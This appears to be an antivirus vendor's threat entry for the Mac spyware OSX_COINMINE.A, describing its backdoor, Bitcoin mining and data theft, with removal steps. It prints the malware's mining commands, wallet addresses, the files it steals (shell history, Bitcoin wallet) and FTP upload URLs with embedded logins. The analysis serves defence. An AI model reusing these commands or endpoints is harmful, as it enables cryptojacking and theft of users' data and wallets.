OSX_COINMINE.A
Backdoor:MacOS_X/DevilRobber.A (Microsoft)
Mac OS X
Threat Type: Spyware
Destructiveness: No
Encrypted: Yes
In the wild: Yes
OVERVIEW
This spyware executes a Bitcoin miner daemon by running a certain command. It executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing command-line parameters. It creates a text file dump.txt that contains the certain information. It zips the file dump.txt to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip by running the a command. It uploads {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip to FTP servers.
This Spyware may arrive bundled with malware packages as a malware component. It may be downloaded by other malware/grayware from remote sites.
It executes commands from a remote malicious user, effectively compromising the affected system.
TECHNICAL DETAILS
Varies
Mach-O, Script
Yes
02 Nov 2011
Creates files
Arrival Details
This Spyware may arrive bundled with malware packages as a malware component.
It may be downloaded by the following malware/grayware from remote sites:
- TROJ_COINMINE.A
Backdoor Routine
This Spyware opens the following port(s) where it listens for remote commands:
- TCP port 34123
It executes the following commands from a remote malicious user:
- 1 - execute a command and return the result to the remote client
- 2 - take a screenshot by running the command screencapture -T 0 -x 1.png, uuencode the file 1.png to s.txt, send s.txt to the remote client, and delete 1.png and s.txt after sending
- any other command - close the connection
NOTES:
It executes a Bitcoin miner daemon by running the following command:
- ./minerd --url http://su.mining.eligius.st:8337 --userpass {Bitcoin host user name}:123 --algo cryptopp_asm32
It executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing the following command-line parameters:
- -u {Bitcoin host user name} -p 123 -o su.mining.eligius.st -r 8337 -v 2 -f 20
{Bitcoin host user name} can be any of the following:
- 16i22nMinPcWf5UUSVNWBosZbQ65DsfiAX
- 15DzENUPvq3TSsnr4QgMFY8L8mih1MRpi1
- 1FNnnNMDoPQA2PwHJaK3cZZSTcWq42GRTh
It creates a text file dump.txt that contains the following information:
- Number of files whose file name contains truecrypt
- Number of files whose file name contains pthc
- Number of files whose file name contains vidalia
- The entire contents of the file /Users/{user name}/.bash_history
- The entire contents of the file /Users/{user name}/Library/Application Support/Bitcoin/wallet.dat, if it exists
It zips the file dump.txt to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip by running the following command:
- zip -r -X {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip dump.txt
It uploads {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip to the following FTP servers:
- ftp://bubba47:semiram237@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
- ftp://acab73:boss583@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
- ftp://manamar489:most832@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
It drops the file status.cfg which contains its current configuration.
SOLUTION
9.200
8.560.05
09 Nov 2011
8.561.00
10 Nov 2011
Step 1
Remove the malware/grayware file that dropped/downloaded OSX_COINMINE.A. (Note: Please skip this step if the threat(s) listed below have already been removed.)
Step 2
Remove the malware/grayware file dropped/downloaded by OSX_COINMINE.A. (Note: Please skip this step if the threat(s) listed below have already been removed.)
Step 3
Restart in normal mode and scan your computer with your Trend Micro product for files detected as OSX_COINMINE.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
Did this description help? Tell us how we did.